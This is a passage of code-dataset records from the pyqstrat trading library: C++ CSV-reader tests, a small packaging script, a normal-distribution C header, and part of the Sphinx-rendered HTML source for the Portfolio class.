test_csv_reader2() {\n cout << \"starting\" << endl;\n vector<void*> output(2);\n bool more_to_read = read_csv(\"/Users/sal/tmp/test.csv\",\n {15, 18, 20},\n {\"f4\", \"f4\", \"i4\"},\n ',',\n 1,\n 0,\n output);\n auto vec1 = static_cast<vector<float>*>(output[0]);\n cout << \"num_cols: \" << output.size() << \" num rows: \" << vec1->size() << \" more_to_read: \" << more_to_read\n << \" first entry: \" << (*vec1)[0] << endl;\n}\n\nvoid test_csv_reader_zip() {\n for (int j=0; j < 100000; ++j) {\n cout << \"starting\" << endl;\n vector<void*> output(2);\n bool more_to_read = read_csv(\"/Users/sal/tmp/algo/20220316.zip:20220316/A/AAPL.csv\",\n {2, 9, 18, 27, 35, 48, 49},\n {\"S5\", \"f4\", \"f4\", \"f4\", \"f4\", \"i4\", \"i4\"},\n ',',\n 1,\n 0,\n output);\n auto vec1 = static_cast<vector<float>*>(output[1]);\n cout << \"num_cols: \" << output.size() << \" num rows: \" << vec1->size() << \" more_to_read: \" << more_to_read\n << \" first entry: \" << (*vec1)[0] << endl;\n delete static_cast<vector<string>*>(output[0]);\n for (size_t i=1; i < output.size(); ++i) {\n if (i != 0 && i != 5) {\n delete static_cast<vector<float>*>(output[i]);\n }\n }\n delete static_cast<vector<int32_t>*>(output[5]);\n }\n cout << \"done\" << endl;\n}\n\n" }, { "alpha_fraction": 0.695652186870575, "alphanum_fraction": 0.7101449370384216, "avg_line_length": 16.25, "blob_id": "1f44ec1704c20b243f25367442a0a80b9a8a329f", "content_id": "9bb983ed61b54625d2e056359a89c6c1fb31a7b7", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 69, "license_type": "permissive", "max_line_length": 22, "num_lines": 4, "path": "/dist.sh", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#!/bin/bash\nrm -Rf dist/*\npython3 setup.py sdist\ntwine upload dist/*\n" }, { "alpha_fraction": 0.5573654174804688, "alphanum_fraction": 0.6699716448783875, "avg_line_length": 40.52941131591797, "blob_id": "825ae5de344ac1e2eb81f2c47296d23f67576d34", "content_id": "fe9b16a8b998359e563fd720b9e52c15cb969709", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1413, "license_type": "permissive", "max_line_length": 92, "num_lines": 34, "path": "/pyqstrat/cpp/lets_be_rational/normaldistribution.h", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n#ifndef NORMAL_DISTRIBUTION_H\n#define NORMAL_DISTRIBUTION_H\n\n#include <math.h>\n#include <cmath>\n#include \"importexport.h\"\n\n#define ONE_OVER_SQRT_TWO 0.7071067811865475244008443621048490392848359376887\n#define ONE_OVER_SQRT_TWO_PI 0.3989422804014326779399460599343818684758586311649\n#define SQRT_TWO_PI 2.506628274631000502415765284811045253006986740610\n\nEXPORT_EXTERN_C double erf_cody(double 
z);\nEXPORT_EXTERN_C double erfc_cody(double z);\nEXPORT_EXTERN_C double erfcx_cody(double z);\nEXPORT_EXTERN_C double norm_cdf(double z);\ninline double norm_pdf(double x){ return ONE_OVER_SQRT_TWO_PI*exp(-.5*x*x); }\nEXPORT_EXTERN_C double inverse_norm_cdf(double u);\n\n#endif // NORMAL_DISTRIBUTION_H\n" }, { "alpha_fraction": 0.5985972881317139, "alphanum_fraction": 0.6098716855049133, "avg_line_length": 131.20252990722656, "blob_id": "780cf90f4ebaf358587b44dac1f8696754ec17f0", "content_id": "1179cde6df8a0c4637f7a26c93fa406a975f7245", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 41776, "license_type": "permissive", "max_line_length": 706, "num_lines": 316, "path": "/docs/_modules/pyqstrat/portfolio.html", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "\n<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <title>pyqstrat.portfolio &#8212; pyqstrat 0.1.0 documentation</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/pygments.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/alabaster.css\" />\n <script data-url_root=\"../../\" id=\"documentation_options\" src=\"../../_static/documentation_options.js\"></script>\n <script src=\"../../_static/jquery.js\"></script>\n <script src=\"../../_static/underscore.js\"></script>\n <script src=\"../../_static/_sphinx_javascript_frameworks_compat.js\"></script>\n <script src=\"../../_static/doctools.js\"></script>\n <link rel=\"index\" title=\"Index\" href=\"../../genindex.html\" />\n <link rel=\"search\" title=\"Search\" href=\"../../search.html\" />\n \n <link rel=\"stylesheet\" href=\"../../_static/custom.css\" type=\"text/css\" />\n \n \n <meta name=\"viewport\" content=\"width=device-width, initial-scale=0.9, maximum-scale=0.9\" />\n\n </head><body>\n \n\n <div class=\"document\">\n <div class=\"documentwrapper\">\n <div class=\"bodywrapper\">\n \n\n <div class=\"body\" role=\"main\">\n \n <h1>Source code for pyqstrat.portfolio</h1><div class=\"highlight\"><pre>\n<span></span><span class=\"c1\"># $$_ Lines starting with # $$_* autogenerated by jup_mini. 
Do not modify these</span>\n<span class=\"c1\"># $$_code</span>\n<span class=\"c1\"># $$_ %%checkall</span>\n<span class=\"kn\">from</span> <span class=\"nn\">__future__</span> <span class=\"kn\">import</span> <span class=\"n\">annotations</span>\n<span class=\"kn\">import</span> <span class=\"nn\">pandas</span> <span class=\"k\">as</span> <span class=\"nn\">pd</span>\n<span class=\"kn\">import</span> <span class=\"nn\">numpy</span> <span class=\"k\">as</span> <span class=\"nn\">np</span>\n<span class=\"kn\">from</span> <span class=\"nn\">functools</span> <span class=\"kn\">import</span> <span class=\"n\">reduce</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.evaluator</span> <span class=\"kn\">import</span> <span class=\"n\">compute_return_metrics</span><span class=\"p\">,</span> <span class=\"n\">display_return_metrics</span><span class=\"p\">,</span> <span class=\"n\">plot_return_metrics</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.strategy</span> <span class=\"kn\">import</span> <span class=\"n\">Strategy</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_utils</span> <span class=\"kn\">import</span> <span class=\"n\">get_child_logger</span>\n<span class=\"kn\">from</span> <span class=\"nn\">typing</span> <span class=\"kn\">import</span> <span class=\"n\">Any</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections.abc</span> <span class=\"kn\">import</span> <span class=\"n\">Sequence</span>\n\n<span class=\"n\">_logger</span> <span class=\"o\">=</span> <span class=\"n\">get_child_logger</span><span class=\"p\">(</span><span class=\"vm\">__name__</span><span class=\"p\">)</span>\n\n<span class=\"n\">NAT</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;NaT&#39;</span><span class=\"p\">)</span>\n\n\n<div class=\"viewcode-block\" id=\"Portfolio\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">Portfolio</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;A portfolio contains one or more strategies that run concurrently so you can test running strategies that are uncorrelated together.&#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"Portfolio.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;main&#39;</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Args:</span>\n<span class=\"sd\"> name: String used for displaying this portfolio</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">name</span> <span class=\"o\">=</span> <span class=\"n\">name</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Strategy</span><span class=\"p\">]</span> <span 
class=\"o\">=</span> <span class=\"p\">{}</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.add_strategy\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.add_strategy\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">add_strategy</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">strategy</span><span class=\"p\">:</span> <span class=\"n\">Strategy</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> name: Name of the strategy</span>\n<span class=\"sd\"> strategy: Strategy instance</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">strategy</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">name</span> <span class=\"o\">=</span> <span class=\"n\">name</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run_indicators\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run_indicators\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run_indicators</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Compute indicators for the strategies specified</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;a portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span>\n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">info</span><span class=\"p\">(</span><span class=\"sa\">f</span><span 
class=\"s1\">&#39;running strategy indicators: </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">run_indicators</span><span class=\"p\">()</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run_signals\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run_signals\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run_signals</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Compute signals for the strategies specified. Must be called after run_indicators</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;a portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span> \n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">info</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;running signals: </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">run_indicators</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">run_signals</span><span class=\"p\">()</span></div>\n \n <span class=\"k\">def</span> <span class=\"nf\">_generate_order_iterations</span><span 
class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">strategies</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">Strategy</span><span class=\"p\">],</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"n\">Strategy</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">]]]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; class Strategy:</span>\n<span class=\"sd\"> ... def __init__(self, num): </span>\n<span class=\"sd\"> ... self.timestamps = [</span>\n<span class=\"sd\"> ... np.array([&#39;2018-01-01&#39;, &#39;2018-01-02&#39;, &#39;2018-01-03&#39;], dtype=&#39;M8[D]&#39;),</span>\n<span class=\"sd\"> ... np.array([&#39;2018-01-02&#39;, &#39;2018-01-03&#39;, &#39;2018-01-04&#39;], dtype=&#39;M8[D]&#39;)][num]</span>\n<span class=\"sd\"> ... self.num = num</span>\n<span class=\"sd\"> ... def _generate_order_iterations(self, start_date, end_date):</span>\n<span class=\"sd\"> ... pass</span>\n<span class=\"sd\"> ... def __repr__(self):</span>\n<span class=\"sd\"> ... 
return f&#39;{self.num}&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; all_timestamps, orders_iter = Portfolio._generate_order_iterations(None, [Strategy(0), Strategy(1)])</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert(all(all_timestamps == np.array([&#39;2018-01-01&#39;, &#39;2018-01-02&#39;, &#39;2018-01-03&#39;,&#39;2018-01-04&#39;], dtype = &#39;M8[D]&#39;)))</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert(all(orders_iter[0][1] == np.array([0, 1, 2, 3])))</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert(all(orders_iter[1][1] == np.array([0, 0, 1, 2])))</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategies</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategies</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">values</span>\n \n <span class=\"n\">timestamps_list</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span> <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">]</span>\n \n <span class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">(</span><span class=\"n\">reduce</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">union1d</span><span class=\"p\">,</span> <span class=\"n\">timestamps_list</span><span class=\"p\">))</span>\n \n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">start_date</span><span class=\"p\">):</span>\n <span class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">all_timestamps</span><span class=\"p\">[(</span><span class=\"n\">all_timestamps</span> <span class=\"o\">&gt;=</span> <span class=\"n\">start_date</span><span class=\"p\">)]</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">end_date</span><span class=\"p\">):</span>\n <span class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">all_timestamps</span><span class=\"p\">[(</span><span class=\"n\">all_timestamps</span> <span class=\"o\">&lt;=</span> <span class=\"n\">end_date</span><span class=\"p\">)]</span>\n \n <span class=\"n\">iterations</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n \n <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">:</span>\n <span class=\"n\">indices</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">all_timestamps</span><span class=\"p\">)</span>\n <span class=\"n\">iterations</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">strategy</span><span class=\"p\">,</span> <span 
class=\"n\">indices</span><span class=\"p\">))</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">_generate_order_iterations</span><span class=\"p\">(</span><span class=\"n\">start_date</span><span class=\"o\">=</span><span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"o\">=</span><span class=\"n\">end_date</span><span class=\"p\">)</span>\n \n <span class=\"k\">return</span> <span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span class=\"n\">iterations</span>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run_rules\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run_rules\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run_rules</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Run rules for the strategies specified. Must be called after run_indicators and run_signals. 
</span>\n<span class=\"sd\"> See run function for argument descriptions</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;a portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n\n <span class=\"n\">strategies</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">key</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">key</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">]</span>\n \n <span class=\"n\">min_date</span> <span class=\"o\">=</span> <span class=\"nb\">min</span><span class=\"p\">([</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">])</span>\n <span class=\"k\">if</span> <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">min_date</span> <span class=\"o\">=</span> <span class=\"nb\">max</span><span class=\"p\">(</span><span class=\"n\">min_date</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">)</span>\n <span class=\"n\">max_date</span> <span class=\"o\">=</span> <span class=\"nb\">max</span><span class=\"p\">([</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">])</span>\n <span class=\"k\">if</span> <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">max_date</span> <span class=\"o\">=</span> <span class=\"nb\">min</span><span class=\"p\">(</span><span class=\"n\">max_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span>\n \n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">info</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;generating order iterations: </span><span class=\"si\">{</span><span class=\"n\">start_date</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">end_date</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n \n <span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span 
class=\"n\">iterations</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_generate_order_iterations</span><span class=\"p\">(</span><span class=\"n\">strategies</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span>\n \n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">all_timestamps</span><span class=\"p\">):</span>\n <span class=\"k\">for</span> <span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"p\">,</span> <span class=\"n\">indices</span><span class=\"p\">)</span> <span class=\"ow\">in</span> <span class=\"n\">iterations</span><span class=\"p\">:</span>\n <span class=\"c1\"># index into strategy timestamps</span>\n <span class=\"n\">idx</span> <span class=\"o\">=</span> <span class=\"n\">indices</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span>\n <span class=\"k\">if</span> <span class=\"n\">idx</span> <span class=\"o\">!=</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"n\">idx</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">_run_iteration</span><span class=\"p\">(</span><span class=\"n\">idx</span><span class=\"p\">)</span>\n \n <span class=\"c1\"># Make sure we calc to the end for each strategy</span>\n <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">:</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">calc</span><span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">])</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span 
